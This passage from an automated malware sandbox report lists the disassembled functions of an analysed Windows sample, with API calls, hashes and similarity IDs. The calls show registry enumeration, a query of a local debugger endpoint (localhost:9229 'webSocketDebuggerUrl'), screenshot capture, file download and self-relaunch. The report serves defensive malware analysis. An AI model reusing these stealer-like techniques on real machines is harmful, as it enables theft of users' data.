                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 07076c74acf082d1b9cec84439303526269f7b9b2491ae8a019549d1b8058fe0
                                • Instruction ID: 4369463b9b7f9a9ece773d473047e78d8e1fefb94b2f178c3adab3033111386d
                                • Opcode Fuzzy Hash: 07076c74acf082d1b9cec84439303526269f7b9b2491ae8a019549d1b8058fe0
                                • Instruction Fuzzy Hash: A2021B70A012068FCB25DF65D95AFBAB7A6FF44304F18906DE8099B361DB35DC82CB90
                                Function 006E3760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006E71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006E71FE
                                • RegOpenKeyExA.ADVAPI32(?,00F1BEA8,00000000,00020019,?), ref: 006E37BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 006E37F7
                                • wsprintfA.USER32 ref: 006E3822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 006E3840
                                • RegCloseKey.ADVAPI32(?), ref: 006E384E
                                • RegCloseKey.ADVAPI32(?), ref: 006E3858
                                • RegQueryValueExA.ADVAPI32(?,00F203B8,00000000,000F003F,?,?), ref: 006E38A1
                                • lstrlen.KERNEL32(?), ref: 006E38B6
                                • RegQueryValueExA.ADVAPI32(?,00F20310,00000000,000F003F,?,00000400), ref: 006E3927
                                • RegCloseKey.ADVAPI32(?), ref: 006E3972
                                • RegCloseKey.ADVAPI32(?), ref: 006E3989
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: edb4cd217f9e4f1d767863378100d724f34819353b7e794ff9e9fbeb235c4d36
                                • Instruction ID: 8716925c9419122602df906c515948b64e78482a70786fce2fe4e7867b2053b4
                                • Opcode Fuzzy Hash: edb4cd217f9e4f1d767863378100d724f34819353b7e794ff9e9fbeb235c4d36
                                • Instruction Fuzzy Hash: 19917E729012589FCB10DFA5D984EEEB7BAFB88310F14856DE509AB311DB31AE45CF90
                                Function 006C90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenA.WININET(006ECFEC,00000001,00000000,00000000,00000000), ref: 006C90DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006C90FC
                                • InternetCloseHandle.WININET(00000000), ref: 006C9109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 006C9166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 006C9197
                                • InternetCloseHandle.WININET(00000000), ref: 006C91A2
                                • InternetCloseHandle.WININET(00000000), ref: 006C91A9
                                • strlen.MSVCRT ref: 006C91BA
                                • strlen.MSVCRT ref: 006C91ED
                                • strlen.MSVCRT ref: 006C922E
                                • strlen.MSVCRT ref: 006C924C
                                  • Part of subcall function 006C8980: std::_Xinvalid_argument.LIBCPMT ref: 006C8996
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: 7d9c41cdd90afea99622115dde6c63bb2af21ee664c455d8749fe3b35bbef64f
                                • Instruction ID: 8c41ca0ce05017b65569c0980b34f82dcc759243b3c5949f9b2bf4b2fa59b619
                                • Opcode Fuzzy Hash: 7d9c41cdd90afea99622115dde6c63bb2af21ee664c455d8749fe3b35bbef64f
                                • Instruction Fuzzy Hash: B6519371610249ABD720DFA8DC49FEEB7BAEF44720F140169F505A3281DFB4AA44C7A5
                                Function 006E1660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 006E16A1
                                • lstrcpy.KERNEL32(00000000,00F0A750), ref: 006E16CC
                                • lstrlen.KERNEL32(?), ref: 006E16D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E16F6
                                • lstrcat.KERNEL32(00000000,?), ref: 006E1704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E172A
                                • lstrlen.KERNEL32(00F1FF28), ref: 006E173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E1762
                                • lstrcat.KERNEL32(00000000,00F1FF28), ref: 006E176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1792
                                • ShellExecuteEx.SHELL32(?), ref: 006E17CD
                                • ExitProcess.KERNEL32 ref: 006E1803
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: a4d54ffe67e15c83f871f725c6e436e293759c7beda8a3e89f4ed37a8dc31830
                                • Instruction ID: 9fdf00861f827ca6c9ad5a9a7af58e443dd1dcdf4f500efd1485e961e7e4dc4a
                                • Opcode Fuzzy Hash: a4d54ffe67e15c83f871f725c6e436e293759c7beda8a3e89f4ed37a8dc31830
                                • Instruction Fuzzy Hash: 00515F70A0265AABDB11DFB6C894EAEB7BAFF44700F044129E909E7351DF30AE01CB54
                                Function 006DEFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DEFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DF012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006DF026
                                • lstrlen.KERNEL32(00000000), ref: 006DF035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 006DF053
                                • StrStrA.SHLWAPI(00000000,?), ref: 006DF081
                                • lstrlen.KERNEL32(?), ref: 006DF094
                                • lstrlen.KERNEL32(00000000), ref: 006DF0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006DF0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006DF13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: 8a327b3f5ac784ecbe57ebaef47b4d6f083d8eecc496fd8f3e08d0d1a750490c
                                • Instruction ID: 7225114c3fe9b79c1ab40d97a44db5bbe0409abb91308983d8e19bb3c8d91ebf
                                • Opcode Fuzzy Hash: 8a327b3f5ac784ecbe57ebaef47b4d6f083d8eecc496fd8f3e08d0d1a750490c
                                • Instruction Fuzzy Hash: 3C517771A106069FCB21AB7ADC59FBA77A6EF90300F04406EEC4ADB312DE30DC018B94
                                Function 006CA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(00F18B60,008F9BD8,0000FFFF), ref: 006CA026
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CA053
                                • lstrlen.KERNEL32(008F9BD8), ref: 006CA060
                                • lstrcpy.KERNEL32(00000000,008F9BD8), ref: 006CA08A
                                • lstrlen.KERNEL32(006F4C4C), ref: 006CA095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CA0B2
                                • lstrcat.KERNEL32(00000000,006F4C4C), ref: 006CA0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CA0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CA0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CA114
                                • SetEnvironmentVariableA.KERNEL32(00F18B60,00000000), ref: 006CA12F
                                • LoadLibraryA.KERNEL32(00F04FF0), ref: 006CA143
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: e2b51c3ff6d98ac486952cb610bc7ddcbdc1eb6c25b04b5366c7ab8967ab27f8
                                • Instruction ID: 74da5ec27135c037641f32edce80168a6049f812f1c1de79d84f24dd257e4dbe
                                • Opcode Fuzzy Hash: e2b51c3ff6d98ac486952cb610bc7ddcbdc1eb6c25b04b5366c7ab8967ab27f8
                                • Instruction Fuzzy Hash: 38917C30A00A198FD7219FF4DC48FB636A7FB54718B44412CE90987762EF79D981CB92
                                Function 006DC840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DC8A2
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DC8D1
                                • lstrlen.KERNEL32(00000000), ref: 006DC8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DC932
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006DC943
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 0631bd5afbbbceca41464c65418313b14a697a36c14290e58593347e2e8a97cf
                                • Instruction ID: e63f04a11500e773bef08abdec33c856418ed172fd7d6a034fcf6f961e64fbd1
                                • Opcode Fuzzy Hash: 0631bd5afbbbceca41464c65418313b14a697a36c14290e58593347e2e8a97cf
                                • Instruction Fuzzy Hash: 16618D71D1121A9BDB10EFB58849FFE7BBABF45360F04006AE845E7341DB349905CBA0
                                Function 006E41E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,006E0CF0), ref: 006E4276
                                • GetDesktopWindow.USER32 ref: 006E4280
                                • GetWindowRect.USER32(00000000,?), ref: 006E428D
                                • SelectObject.GDI32(00000000,00000000), ref: 006E42BF
                                • GetHGlobalFromStream.COMBASE(006E0CF0,?), ref: 006E4336
                                • GlobalLock.KERNEL32(?), ref: 006E4340
                                • GlobalSize.KERNEL32(?), ref: 006E434D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: f674e65531912ce88b2b76a212c8931d4bf6569342a67080e1312a1aa372752c
                                • Instruction ID: a6946b8e8aeb92e188bc35d3895e2ed076c8f37d66cee33bff6ae9fffd02481c
                                • Opcode Fuzzy Hash: f674e65531912ce88b2b76a212c8931d4bf6569342a67080e1312a1aa372752c
                                • Instruction Fuzzy Hash: 0551F9B5A10209AFDB10DFB5DC89EBEB7B9FF88310F104519F905A7250DE34AA01CBA4
                                Function 006DDFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,00F205B0), ref: 006DE00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DE037
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE07D
                                • lstrcat.KERNEL32(?,?), ref: 006DE098
                                • lstrcat.KERNEL32(?,?), ref: 006DE0AC
                                • lstrcat.KERNEL32(?,00F0A6D8), ref: 006DE0C0
                                • lstrcat.KERNEL32(?,?), ref: 006DE0D4
                                • lstrcat.KERNEL32(?,00F1F4C0), ref: 006DE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006DE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 5a7065e87215b08f70c3c6d5ce47a74cc08311f64c6c8f5a0a3c840b6de9dbe7
                                • Instruction ID: 3ba63e94ae1a78562eab53f0677b5b866d38f8b1af34f30c35bb59bdc1e4affd
                                • Opcode Fuzzy Hash: 5a7065e87215b08f70c3c6d5ce47a74cc08311f64c6c8f5a0a3c840b6de9dbe7
                                • Instruction Fuzzy Hash: DB612A7191011CABCB55EB64DC58BED77B6BF88300F1049A9EA49A7350DE709F85CF90
                                Function 006C6AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C6AFF
                                • InternetOpenA.WININET(006ECFEC,00000001,00000000,00000000,00000000), ref: 006C6B2C
                                • StrCmpCA.SHLWAPI(?,00F20BB8), ref: 006C6B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 006C6B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006C6B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006C6BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 006C6BC6
